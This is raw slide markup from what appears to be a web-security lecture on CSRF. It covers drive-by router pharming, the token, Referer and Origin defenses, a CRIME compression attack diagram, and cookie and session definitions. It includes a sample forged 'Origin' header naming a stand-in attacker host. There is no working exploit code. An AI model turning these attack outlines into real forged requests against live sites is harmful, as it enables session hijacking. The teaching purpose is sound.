            <a:chExt cx="3543480" cy="1162080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="898" name="TextBox 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196280" y="2634840"/>
              <a:ext cx="238032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Cambria"/>
                  <a:ea typeface="ＭＳ Ｐゴシック"/>
                </a:rPr>
                <a:t>1. configure router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899" name="Elbow Connector 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="2222640" y="1662480"/>
              <a:ext cx="725040" cy="3543480"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd type="arrow" w="med" len="med"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="3996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900" name="Group 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="813960" y="4406760"/>
            <a:ext cx="5434200" cy="1092960"/>
            <a:chOff x="813960" y="4406760"/>
            <a:chExt cx="5434200" cy="1092960"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="901" name="TextBox 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2010960" y="5130720"/>
              <a:ext cx="3139200" cy="3639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Cambria"/>
                  <a:ea typeface="ＭＳ Ｐゴシック"/>
                </a:rPr>
                <a:t>2. visits malicious site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902" name="Elbow Connector 41"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="2984040" y="2235960"/>
              <a:ext cx="1092960" cy="5434200"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd type="arrow" w="med" len="med"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="3996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903" name="Rounded Rectangle 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5987160" y="3352680"/>
            <a:ext cx="2851920" cy="1294920"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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50% of home routers have default or no pw*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4" name="TextBox 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="586800" y="6488640"/>
            <a:ext cx="8100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mbria"/>
              </a:rPr>
              <a:t>* source: “Drive-By Pharming”,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mbria"/>
              </a:rPr>
              <a:t>Stamm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t> et al. Symantec report, 2006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442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CSRF Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="906" name="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240" cy="4754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91960" indent="-2919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mbria"/>
              </a:rPr>
              <a:t>Secret Validation Token</a:t>
            </a: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mbria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mbria"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="291960" indent="-2919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mbria"/>
              </a:rPr>
              <a:t>Referer Validation</a:t>
            </a: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mbria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mbria"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="291960" indent="-2919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mbria"/>
              </a:rPr>
              <a:t>Origin Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="907" name="Text Box 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5318280" y="6145200"/>
            <a:ext cx="183960" cy="3362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8" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3354480" y="2210760"/>
            <a:ext cx="5405040" cy="45684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  <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>&lt;input type=hidden value=23a3af01b&gt;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909" name="Picture 16"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1467000" y="3943440"/>
            <a:ext cx="1523520" cy="721440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="910" name="Picture 18"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1963080"/>
            <a:ext cx="799920" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="911" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3354480" y="4075560"/>
            <a:ext cx="5405040" cy="45684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  <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Referer: http://www.facebook.com/home.php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2" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="890280" y="6553080"/>
            <a:ext cx="6882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mbria"/>
              </a:rPr>
              <a:t>* Referrer is misspelled as “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mbria"/>
              </a:rPr>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>” in HTTP header field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913" name="Picture 16"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1467000" y="5642280"/>
            <a:ext cx="1523520" cy="721440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="914" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3354480" y="5774760"/>
            <a:ext cx="5405040" cy="45684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  <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Origin: http://www.facebook.com/home.php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5" name="Multiply 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990720" y="3204720"/>
            <a:ext cx="7924320" cy="1904760"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst>
              <a:gd name="adj1" fmla="val 23520"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="990000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="71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6" name="Rounded Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2228760" y="3939120"/>
            <a:ext cx="5790960" cy="51876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>
            <a:solidFill>
              <a:srgbClr val="71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ambria"/>
              </a:rPr>
              <a:t>Not designed for CSRF Protection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55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Secret Token Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="918" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981080"/>
            <a:ext cx="8229240" cy="414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500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="291960" indent="-2919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mbria"/>
              </a:rPr>
              <a:t>Requests include a hard-to-guess secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635040" lvl="1" indent="-2919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mbria"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Unguessability substitutes for unforgeability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="291960" indent="-2919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mbria"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Variations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="635040" lvl="1" indent="-2919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mbria"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Session identifier</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="635040" lvl="1" indent="-2919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mbria"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Session-independent token</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="635040" lvl="1" indent="-2919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mbria"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Session-dependent token</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="635040" lvl="1" indent="-2919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mbria"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>HMAC of session identifier</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="919" name="Picture 18"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="465120"/>
            <a:ext cx="799920" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="920" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1869120" y="1295280"/>
            <a:ext cx="5405040" cy="45684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  <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>&lt;input type=hidden value=23a3af01b&gt;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09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Secret Token Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="922" name="Content Placeholder 4" descr="Picture 13.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-9983" r="-9983"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8457840" cy="5057280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="923" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="433440" y="5583240"/>
            <a:ext cx="8253000" cy="680760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="37674" dir="2700000" algn="br" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="43000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="924" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419720" y="5715000"/>
            <a:ext cx="4038120" cy="380520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="990000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6516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Referrer Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="926" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2027160"/>
            <a:ext cx="8229240" cy="444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mbria"/>
              </a:rPr>
              <a:t>HTTP Origin header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="34308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9446"/>
                </a:solidFill>
                <a:latin typeface="Zapf Dingbats"/>
                <a:ea typeface="Zapf Dingbats"/>
              </a:rPr>
              <a:t>✓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Wingdings"/>
                <a:ea typeface="Wingdings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Cambria"/>
                <a:ea typeface="Wingdings"/>
              </a:rPr>
              <a:t>Origin: http://www.facebook.com/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  <a:p>
            <a:pPr marL="34308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990000"/>
                </a:solidFill>
                <a:latin typeface="Zapf Dingbats"/>
                <a:ea typeface="Zapf Dingbats"/>
              </a:rPr>
              <a:t>✗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Zapf Dingbats"/>
              </a:rPr>
              <a:t>    Origin: http://www.attacker.com/evil.html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  <a:p>
            <a:pPr marL="34308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ＭＳ ゴシック"/>
                <a:ea typeface="ＭＳ ゴシック"/>
              </a:rPr>
              <a:t>☐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ ゴシック"/>
              </a:rPr>
              <a:t>    Origin: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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927" name="Rounded Rectangular Callout 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231920" y="4694400"/>
            <a:ext cx="6705360" cy="914040"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -30473"/>
              <a:gd name="adj2" fmla="val -105357"/>
              <a:gd name="adj3" fmla="val 16667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Lenient: Accept when not present (insecure)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="2400"/>
            </a:b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Strict: Don’t accept when not present (secure)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928" name="Picture 16"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7124760" y="362880"/>
            <a:ext cx="1523520" cy="721440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="929" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905120" y="1569960"/>
            <a:ext cx="5405040" cy="45684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  <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Origin: http://www.facebook.com/home.php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09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From HW2: The CRIME Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="931" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6747840" y="1633680"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="932" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1633680"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="933" name="Picture 10"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6747840" y="4063320"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="934" name="Picture 11"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7493760" y="2768400"/>
            <a:ext cx="1218960" cy="1218960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="935" name="Picture 12"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7436880" y="5257800"/>
            <a:ext cx="1101600" cy="1101600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="936" name="Straight Arrow Connector 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3090600" y="1911600"/>
            <a:ext cx="3443040" cy="15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7" name="Straight Arrow Connector 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3182760" y="2502000"/>
            <a:ext cx="3292920" cy="16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8" name="Straight Arrow Connector 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819880" y="3101760"/>
            <a:ext cx="3656880" cy="185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9" name="TextBox 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3141720" y="2675520"/>
            <a:ext cx="34927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Malicious Script that sends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forced requests to good.com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0" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="60120" y="3401280"/>
            <a:ext cx="40687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Forced request to good.com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containing session token + some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attacker controlled input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1" name="TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3697200" y="3777120"/>
            <a:ext cx="2285640" cy="638280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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Compressed, then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Encrypted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942" name="Picture 25"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="850320" y="4836600"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="943" name="Picture 26"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604960" y="5508720"/>
            <a:ext cx="1218960" cy="1218960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="944" name="Straight Arrow Connector 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3090600" y="4473360"/>
            <a:ext cx="1023840" cy="70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8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5" name="TextBox 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3489840" y="4878360"/>
            <a:ext cx="202212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Eavesdrop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on packet size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46" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7018920" y="1181520"/>
            <a:ext cx="1145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evil.com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7" name="TextBox 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6341040" y="5919840"/>
            <a:ext cx="1301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good.com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8" name="Rounded Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5819400" y="4946400"/>
            <a:ext cx="2562120" cy="70380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ambria"/>
              </a:rPr>
              <a:t>CSRF Defenses do not prevent this!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134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905000"/>
            <a:ext cx="754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-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> —Maintain the active state between the server and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>client.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> — Record the server and client session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>states.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> — A string generated by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
